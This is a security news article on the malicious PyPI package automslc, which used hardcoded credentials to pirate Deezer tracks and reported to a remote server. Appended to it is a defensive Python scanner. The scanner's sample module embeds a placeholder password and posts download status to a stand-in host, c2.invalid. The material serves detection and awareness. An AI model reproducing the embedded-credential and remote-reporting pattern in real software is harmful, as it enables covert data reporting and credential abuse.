Malicious PyPI Package "automslc" Enables 104K+ Unauthorized Deezer Music Downloads
-
Cybersecurity researchers have identified a malicious Python package named automslc on the Python Package Index (PyPI) that enables unauthorized music downloads from Deezer. Since its first release in May 2019, the package has been downloaded more than 104,000 times and remains available on PyPI.
-
Deezer is a French music streaming service and media service provider founded in 2007 that provides users with access to a vast library of music tracks, podcasts, and radio stations. It offers streaming services in over 180 countries and features a catalog of more than 90 million licensed tracks, making it one of the largest streaming platforms available.
-
The automslc package is advertised as a music automation and metadata retrieval tool, but it circumvents Deezer's access controls by using hardcoded credentials. According to Socket security researcher Kirill Boychenko, it logs into Deezer with user-supplied and embedded credentials, collects track metadata, and downloads full audio files, in violation of Deezer's API terms.
-
The package also periodically contacts a remote server to report download status, which lets the operator coordinate the piracy operation centrally. In effect, automslc turns the machines of its users into a distributed network for mass unauthorized downloads. The server's IP address is associated with the domain automusic[.]win, which the threat actor uses to manage the operation.
-
Deezer's API rules prohibit the local storage of complete audio files. By letting users download and decrypt entire tracks, automslc exposes them to possible legal action. Separately, a malicious npm package named @ton-wallet/create has been found stealing sensitive information from users in the TON ecosystem, underscoring the need to vet third-party packages before installing them and to re-check dependencies regularly.
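The two traits the article attributes to automslc, credentials embedded in the package and periodic reporting to a remote host, are exactly what a quick static triage of a third-party package can look for before it is installed. The scanner below is an added example written for this page; it is not code from Socket, Deezer or the automslc package, and the module it scans is constructed for illustration (the names SERVICE_EMAIL, SERVICE_PASSWORD and REPORT_URL and the host c2.invalid are placeholders, not anything taken from automslc). It walks a module's AST and flags string literals bound to credential-like names, keyword arguments such as password="..." given a literal, outbound HTTP calls from common libraries, and URL literals, then rates the module "suspicious" only when both an embedded credential and a network reporting path are present.

```python
"""Heuristic static scan for two traits described in the article: credentials embedded
as string literals, and outbound HTTP calls or URL literals that could be used to report
back to a remote host. Added example for this page; not code from Socket or from automslc."""
from __future__ import annotations

import ast
import re
from dataclasses import dataclass

# Names that suggest a bound value is a credential (heuristic, deliberately broad).
CREDENTIAL_NAME = re.compile(r"passw(or)?d|secret|token|api_?key|login|email|credential", re.I)
# http(s) URLs inside string literals; a report endpoint would typically look like this.
URL_LITERAL = re.compile(r"https?://[^\s'\"]+", re.I)
# Fully dotted call targets that perform outbound HTTP in common libraries.
NETWORK_CALLS = {
    "requests.get", "requests.post", "requests.put",
    "httpx.get", "httpx.post",
    "urllib.request.urlopen",
}


@dataclass
class Finding:
    kind: str     # "hardcoded_credential", "network_call" or "url_literal"
    line: int
    detail: str   # the variable name, call target or URL that triggered it


def _dotted_name(node: ast.AST) -> str | None:
    """Render an Attribute/Name chain such as requests.post as a dotted string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _is_str_literal(node: ast.AST) -> bool:
    return isinstance(node, ast.Constant) and isinstance(node.value, str) and bool(node.value)


def scan_source(source: str) -> list[Finding]:
    """Walk the module AST and collect the suspicious traits."""
    findings: list[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign) and _is_str_literal(node.value):
            # Trait 1: a non-empty string literal bound to a credential-looking name.
            for target in node.targets:
                if isinstance(target, ast.Name) and CREDENTIAL_NAME.search(target.id):
                    findings.append(Finding("hardcoded_credential", node.lineno, target.id))
        elif isinstance(node, ast.Call):
            # Trait 1, variant: login(password="...") with the literal passed inline.
            for kw in node.keywords:
                if kw.arg and CREDENTIAL_NAME.search(kw.arg) and _is_str_literal(kw.value):
                    findings.append(Finding("hardcoded_credential", node.lineno, kw.arg))
            # Trait 2: an outbound HTTP call that could report status to a remote host.
            target = _dotted_name(node.func)
            if target in NETWORK_CALLS:
                findings.append(Finding("network_call", node.lineno, target))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            # Trait 2, variant: a URL literal that may be the report endpoint.
            for url in URL_LITERAL.findall(node.value):
                findings.append(Finding("url_literal", node.lineno, url))
    return findings


def assess(findings: list[Finding]) -> str:
    """'suspicious' only when both traits co-occur, the pattern the article describes."""
    has_credential = any(f.kind == "hardcoded_credential" for f in findings)
    has_network = any(f.kind in ("network_call", "url_literal") for f in findings)
    if has_credential and has_network:
        return "suspicious"
    if has_credential or has_network:
        return "review"
    return "clean"


# Constructed sample module, written for this example only; the names and the
# host c2.invalid are placeholders and do not come from automslc.
SAMPLE_MODULE = '''\
import requests

SERVICE_EMAIL = "user@example.com"
SERVICE_PASSWORD = "hunter2"
REPORT_URL = "http://c2.invalid/report"

def fetch_track(session_factory, track_id):
    session = session_factory(email=SERVICE_EMAIL, password=SERVICE_PASSWORD)
    audio = session.download(track_id)
    requests.post(REPORT_URL, json={"track": track_id, "status": "done"})
    return audio
'''

if __name__ == "__main__":
    results = scan_source(SAMPLE_MODULE)
    for f in results:
        print(f"line {f.line:>2}  {f.kind:<21} {f.detail}")
    print("verdict:", assess(results))
```

Run it against each .py file in an unpacked sdist or wheel before installing. The heuristics are easy to evade (a credential split across strings, base64-encoded, or fetched at runtime will not be flagged), so treat the verdict as a triage signal to combine with publisher history, release cadence and a review of what the package actually does, not as a clean bill of health.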